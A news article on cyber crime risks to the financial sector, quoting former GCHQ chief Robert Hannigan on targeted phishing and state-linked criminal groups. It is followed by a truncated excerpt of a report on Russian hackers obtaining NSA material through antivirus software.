Few are more aware of the importance of tackling this issue than Robert Hannigan, the former GCHQ boss who joined the intelligence agency in 2014, in the wake of the Edward Snowden revelations, and left earlier this year. Credited with preparing the UK for a new era of cyber challenges (he was behind the launch of the cyber centre), he is now advising businesses on how to prepare for future risks.

“Attacks used to be very crude misspelled [emails], now they are sophisticated – we have seen criminals researching targets, seeing where a CEO’s children go to school so an email looks like it comes from there,” he says, illustrating how hard it can be to spot a red flag. “These aren’t teenagers in a bedroom, these are seriously organised groups. They’ve taken the internet and gig economy model and hire people in.”

Having been Tony Blair’s adviser on Northern Ireland peace talks and a former director general of defence and intelligence at the Foreign Office, Mr Hannigan has seen first hand the changes in the way criminal gangs operate. Many have grown up with the internet, and with technology moving so fast one of the biggest challenges is trying to forecast what the techniques will be in 10 or 20 years, he says.

Trying to make that prediction will require a lot more specialists than are currently available. The UK has a shortage of experts, with start-ups competing to recruit convicted hackers for expertise. Lobby group TheCityUK told The Daily Telegraph this year that it wants to see cyber schools in each UK city with a big financial services presence so that institutions aren’t scrabbling for talent; meanwhile, plans to transform Bletchley Park – used to crack codes in the Second World War – into the UK’s first National College of Cyber Security have been delayed by a year. Part of Ms McGuinness’s trip to Israel this week will be about learning how to draw cyber entrepreneurs to the UK.

Mr Hannigan, who is currently advising Lloyd’s of London insurer Hiscox on potential cyber risks, warns that, while the finance sector is miles ahead of many others in terms of cyber security and awareness, institutions can be “naive” when it comes to state-linked cyber threats, with many underestimating the extent to which some countries work with crime groups.

“As state and crime threats merge in some areas, that’s something which needs more work,” he said, using North Korea as an example. “Institutions tend to think that states wouldn’t want to damage the international financial system which they have a stake in, but of course North Korea doesn’t have a stake in it and doesn’t really care.

“That crossover of crime and state is here to stay. I think, thinking beyond fraud and crime, companies need to think about the motives of states that might want to access their data. Financial institutions hold very personal data about millions of people.”

“Cyber crime certainly is capable of causing the next financial crisis – anything that undermines confidence in the banking system could have that effect,” adds Mr Moir, underlining the severity of a potential attack. “Suppose hackers penetrate a bank’s systems and manipulate balances or mortgages so they can no longer be trusted?”



Russian government hackers used antivirus software to steal U.S. cyber capabilities

Source: National Cyber Security – Produced By Gregory Evans

Russian government hackers lifted details of U.S. cyber capabilities from a National Security Agency employee who was running Russian antivirus software on his computer, according to several individuals familiar with the matter. The employee had taken classified material home to work on it on his computer, and his use of…
